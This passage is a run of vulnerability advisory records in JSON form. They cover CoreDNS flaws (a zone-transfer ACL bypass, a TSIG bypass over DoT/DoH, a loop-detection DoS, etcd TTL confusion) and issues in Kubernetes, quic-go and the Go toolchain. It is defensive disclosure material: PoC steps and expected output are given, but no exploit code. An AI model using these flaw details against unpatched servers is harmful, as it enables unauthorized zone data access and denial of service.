"details": "### Summary\nCoreDNS\u0027 transfer plugin can select the wrong ACL stanza when both a parent zone and a more-specific subzone are configured. A permissive parent-zone transfer rule can override a restrictive subzone rule (name-dependent), allowing an unauthorized client to perform AXFR/IXFR for the subzone and retrieve its zone contents.\n\n### Details\nIn plugin/transfer/transfer.go, stanza selection is implemented by longestMatch(), which is documented as \"longest zone match wins\", but it actually chooses the winner via a lexicographic string comparison:\n- zone := \"\" // longest zone match wins (plugin/transfer/transfer.go)\n- if z \u003e zone { zone = z; x = xfr } (plugin/transfer/transfer.go)\n\nSo, a parent zone like example.org. can beat a child zone like a.example.org. purely due to lexicographic ordering (\"example.org.\" \u003e \"a.example.org.\"), even though the child zone is the longer/more specific suffix match. The bypass is data-dependent (some child labels will win, some will lose), making it operationally non-intuitive.\n\n### PoC\n1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)\n2. Run python3 ./acl-repro.py\n3. Expected output:\n*** Baseline (only subzone transfer rule) ***\naxfr a.example.org.: rcode=5 ancount=0 (expected REFUSED=5)\n\n*** Candidate (add permissive parent transfer rule) ***\naxfr a.example.org.: rcode=0 ancount=5 (expected NOERROR=0 with ancount\u003e0)\n\n*** OK ***\nSubzone transfer ACL bypass reproduced: adding a permissive parent-zone stanza can override a stricter child-zone stanza due to lexicographic zone selection.\n\n### Impact\nUnauthorized zone transfer can expose full zone contents to a remote network client that was intended to be denied by a subzone-specific transfer policy.",
"id": "GHSA-h8mm-c463-wjq3",
"modified": "2026-05-08T15:28:38Z",
"published": "2026-04-28T22:44:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h8mm-c463-wjq3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33489"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS\u0027 transfer stanza selection uses lexicographic compare (subzone ACL bypass)"
}
GHSA-4X4M-3C2P-QPPC
Vulnerability from github – Published: 2025-08-27 18:31 – Updated: 2025-08-27 19:20A vulnerability exists in the NodeRestriction admission controller in Kubernetes clusters where node users can delete their corresponding node object by patching themselves with an OwnerReference to a cluster-scoped resource. If the OwnerReference resource does not exist or is subsequently deleted, the given node object will be deleted via garbage collection.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.31.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c 1.32.7"
},
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.32.0-alpha.0"
},
{
"fixed": "1.32.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.33.0-alpha.0"
},
{
"fixed": "1.33.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-5187"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-27T19:20:29Z",
"nvd_published_at": "2025-08-27T17:15:48Z",
"severity": "MODERATE"
},
"details": "A vulnerability exists in the NodeRestriction admission controller in Kubernetes clusters where node users can delete their corresponding node object by patching themselves with an OwnerReference to a cluster-scoped resource. If the OwnerReference resource does not exist or is subsequently deleted, the given node object will be deleted via garbage collection.",
"id": "GHSA-4x4m-3c2p-qppc",
"modified": "2025-08-27T19:20:29Z",
"published": "2025-08-27T18:31:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5187"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/issues/133471"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/commit/a2d98cac56a0c5cb2d8abc4d087fc00846b3bc0f"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubernetes/kubernetes"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/kubernetes-security-announce/c/znSNY7XCztE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Kubernetes Nodes can delete themselves by adding an OwnerReference"
}
GHSA-QHMP-Q7XH-99RH
Vulnerability from github – Published: 2026-04-28 22:46 – Updated: 2026-05-08 15:28Summary
CoreDNS' tsig plugin can be bypassed on non-plain-DNS transports because it trusts the transport writer's TsigStatus() instead of performing verification itself. In the attached PoC, plain DNS/TCP correctly rejects an invalid TSIG (NOTAUTH), while the same invalid-TSIG request is accepted over DoT (tls://) and DoH (https://), allowing a client without the shared secret to satisfy require all. The same bug class affects DoH3, DoQ, and gRPC.
Details
The tsig plugin decides whether an incoming TSIG was valid by consulting w.TsigStatus(): tsigStatus := w.TsigStatus(); if tsigStatus != nil { ... NOTAUTH ... } (plugin/tsig/tsig.go)
Two affected transports are shown directly in the PoC: - DoH: DoHWriter.TsigStatus() always returns nil (core/dnsserver/https.go), and the HTTP server passes unpacked DNS messages directly into the plugin chain. - DoT: the TLS server builds a dns.Server without setting TsigSecret (core/dnsserver/server_tls.go), unlike plain DNS/TCP/UDP which sets TsigSecret: s.tsigSecret (core/dnsserver/server.go).
The same transport-family bug pattern also appears on other transports: - DoH3 reuses the DoH writer path (core/dnsserver/server_https3.go -> core/dnsserver/https.go), so it inherits the same TsigStatus() == nil behavior. - DoQ uses DoQWriter.TsigStatus() error { return nil } (core/dnsserver/quic.go). - gRPC uses gRPCresponse.TsigStatus() error { return nil } (core/dnsserver/server_grpc.go).
The attached PoC was kept deliberately small (baseline TCP+DoT+DoH only) for convenience.
PoC
- Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)
- Run python3 ./tsig-repro.py
- Expected output: *** Start CoreDNS *** Corefile: /tmp/vh-f001-tsig-doh-dot-bypass/Corefile Log: /tmp/vh-f001-tsig-doh-dot-bypass/coredns.log
*** Baseline (plain TCP) *** no_tsig rcode=5 (expected REFUSED=5) invalid_tsig rcode=9 (expected NOTAUTH=9)
*** Candidate (DoT) *** no_tsig rcode=5 (expected REFUSED=5) invalid_tsig rcode=0 ancount=1 (expected NOERROR=0 and ancount>0)
*** Candidate (DoH) *** no_tsig http=200 rcode=5 (expected REFUSED=5) invalid_tsig http=200 rcode=0 ancount=1 (expected NOERROR=0 and ancount>0)
*** OK *** TSIG bypass reproduced: plain TCP rejects invalid TSIG, while DoT and DoH accept it. Results: /tmp/vh-f001-tsig-doh-dot-bypass/results.json
Impact
Unauthenticated remote clients can bypass TSIG-based authentication/authorization on first-class encrypted transports, enabling access to whatever the deployment intended to restrict behind tsig { require all } (e.g., zone data/privileged queries, etc.).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33190"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-303"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:46:15Z",
"nvd_published_at": "2026-05-05T20:16:36Z",
"severity": "HIGH"
},
"details": "### Summary\nCoreDNS\u0027 tsig plugin can be bypassed on non-plain-DNS transports because it trusts the transport writer\u0027s TsigStatus() instead of performing verification itself. In the attached PoC, plain DNS/TCP correctly rejects an invalid TSIG (NOTAUTH), while the same invalid-TSIG request is accepted over DoT (tls://) and DoH (https://), allowing a client without the shared secret to satisfy require all. The same bug class affects DoH3, DoQ, and gRPC.\n\n### Details\nThe tsig plugin decides whether an incoming TSIG was valid by consulting w.TsigStatus(): tsigStatus := w.TsigStatus(); if tsigStatus != nil { ... NOTAUTH ... } (plugin/tsig/tsig.go)\n\nTwo affected transports are shown directly in the PoC:\n- DoH: DoHWriter.TsigStatus() always returns nil (core/dnsserver/https.go), and the HTTP server passes unpacked DNS messages directly into the plugin chain.\n- DoT: the TLS server builds a dns.Server without setting TsigSecret (core/dnsserver/server_tls.go), unlike plain DNS/TCP/UDP which sets TsigSecret: s.tsigSecret (core/dnsserver/server.go).\n\nThe same transport-family bug pattern also appears on other transports:\n- DoH3 reuses the DoH writer path (core/dnsserver/server_https3.go -\u003e core/dnsserver/https.go), so it inherits the same TsigStatus() == nil behavior.\n- DoQ uses DoQWriter.TsigStatus() error { return nil } (core/dnsserver/quic.go).\n- gRPC uses gRPCresponse.TsigStatus() error { return nil } (core/dnsserver/server_grpc.go).\n\nThe attached PoC was kept deliberately small (baseline TCP+DoT+DoH only) for convenience.\n\n### PoC\n1. Adjust COREDNS_BIN in the PoC to point at right path (see the top-level const definitions for tunables as well)\n2. Run python3 ./tsig-repro.py\n3. Expected output:\n*** Start CoreDNS ***\nCorefile: /tmp/vh-f001-tsig-doh-dot-bypass/Corefile\nLog: /tmp/vh-f001-tsig-doh-dot-bypass/coredns.log\n\n*** Baseline (plain TCP) ***\nno_tsig rcode=5 (expected REFUSED=5)\ninvalid_tsig rcode=9 (expected NOTAUTH=9)\n\n*** Candidate (DoT) ***\nno_tsig rcode=5 (expected REFUSED=5)\ninvalid_tsig rcode=0 ancount=1 (expected NOERROR=0 and ancount\u003e0)\n\n*** Candidate (DoH) ***\nno_tsig http=200 rcode=5 (expected REFUSED=5)\ninvalid_tsig http=200 rcode=0 ancount=1 (expected NOERROR=0 and ancount\u003e0)\n\n*** OK ***\nTSIG bypass reproduced: plain TCP rejects invalid TSIG, while DoT and DoH accept it.\nResults: /tmp/vh-f001-tsig-doh-dot-bypass/results.json\n\n\n### Impact\nUnauthenticated remote clients can bypass TSIG-based authentication/authorization on first-class encrypted transports, enabling access to whatever the deployment intended to restrict behind tsig { require all } (e.g., zone data/privileged queries, etc.).",
"id": "GHSA-qhmp-q7xh-99rh",
"modified": "2026-05-08T15:28:24Z",
"published": "2026-04-28T22:46:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33190"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS has TSIG authentication bypass on DoT, DoH, DoH3, DoQ, and gRPC"
}
CVE-2026-26018 (GCVE-0-2026-26018)
Vulnerability from cvelistv5 – Published: 2026-03-06 15:35 – Updated: 2026-06-30 12:08| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-26018",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-06T16:07:22.371186Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T16:07:31.587Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:acm:2.14::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2.15::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2.15",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:connectivity_link:1"
],
"defaultStatus": "affected",
"product": "Red Hat Connectivity Link 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-06T15:35:50.801Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in CoreDNS, a DNS server that chains plugins. A remote attacker can exploit this flaw by sending specially crafted DNS queries. This vulnerability exists in CoreDNS\u0027s loop detection plugin due to the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name. Successful exploitation can lead to a denial of service (DoS) by crashing the DNS server."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1241",
"description": "Use of Predictable Algorithm in Random Number Generator",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-30T12:08:13.426Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-26018"
},
{
"name": "RHBZ#2445242",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445242"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-26018.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8151"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:25127: Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"lang": "en",
"value": "RHSA-2026:8151: Red Hat Advanced Cluster Management for Kubernetes 2.15"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-06T16:01:38.150Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-06T15:35:50.801Z",
"value": "Made public."
}
],
"title": "github.com/coredns/coredns: CoreDNS: Denial of Service vulnerability due to predictable pseudo-random number generation",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Prior to version 1.14.2, a denial of service vulnerability exists in CoreDNS\u0027s loop detection plugin that allows an attacker to crash the DNS server by sending specially crafted DNS queries. The vulnerability stems from the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name, combined with a fatal error handler that terminates the entire process. This issue has been patched in version 1.14.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-337",
"description": "CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T15:35:50.801Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
}
],
"source": {
"advisory": "GHSA-h75p-j8xm-m278",
"discovery": "UNKNOWN"
},
"title": "CoreDNS Loop Detection Denial of Service Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-26018",
"datePublished": "2026-03-06T15:35:50.801Z",
"dateReserved": "2026-02-09T21:36:29.554Z",
"dateUpdated": "2026-06-30T12:08:13.426Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-64702 (GCVE-0-2025-64702)
Vulnerability from cvelistv5 – Published: 2025-12-11 20:58 – Updated: 2025-12-12 20:45- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64702",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T20:44:44.521680Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T20:45:30.439Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "quic-go",
"vendor": "quic-go",
"versions": [
{
"status": "affected",
"version": "\u003c 0.57.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go\u0027s HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-11T20:58:10.517Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6"
},
{
"name": "https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8"
}
],
"source": {
"advisory": "GHSA-g754-hx8w-x2g6",
"discovery": "UNKNOWN"
},
"title": "quic-go HTTP/3 QPACK Header Expansion DoS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64702",
"datePublished": "2025-12-11T20:58:10.517Z",
"dateReserved": "2025-11-10T14:07:42.920Z",
"dateUpdated": "2025-12-12T20:45:30.439Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-39817 (GCVE-0-2026-39817)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 21:29- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go toolchain | cmd/go |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39817",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T16:58:23.255142Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T21:29:47.246Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "cmd/go",
"product": "cmd/go",
"vendor": "Go toolchain",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Harshit Gupta (Mr HAX)"
}
],
"descriptions": [
{
"lang": "en",
"value": "The \"go tool pack\" subcommand (usually used only by the compiler as an internal tool with known-good inputs) does not sanitize output filenames. Extracting a malicious archive file with the \"pack\" subcommand can write files to arbitrary locations on the filesystem."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:18.993Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78778"
},
{
"url": "https://go.dev/cl/767520"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4979"
}
],
"title": "Invoking \"go tool pack\" does not sanitize output paths in cmd/go"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39817",
"datePublished": "2026-05-07T19:41:18.993Z",
"dateReserved": "2026-04-07T18:13:03.524Z",
"dateUpdated": "2026-05-08T21:29:47.246Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-58063 (GCVE-0-2025-58063)
Vulnerability from cvelistv5 – Published: 2025-09-09 19:27 – Updated: 2025-09-10 14:26- CWE-681 - Incorrect Conversion between Numeric Types
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58063",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-10T14:26:10.971285Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-10T14:26:13.850Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c 1.12.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-681",
"description": "CWE-681: Incorrect Conversion between Numeric Types",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-09T19:27:18.124Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"name": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
}
],
"source": {
"advisory": "GHSA-93mf-426m-g6x9",
"discovery": "UNKNOWN"
},
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58063",
"datePublished": "2025-09-09T19:27:18.124Z",
"dateReserved": "2025-08-22T14:30:32.222Z",
"dateUpdated": "2025-09-10T14:26:13.850Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2026-39820 (GCVE-0-2026-39820)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-07-03 12:05- CWE-407 - Inefficient Algorithmic Complexity
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | net/mail |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39820",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T14:27:51.595266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T14:27:54.923Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
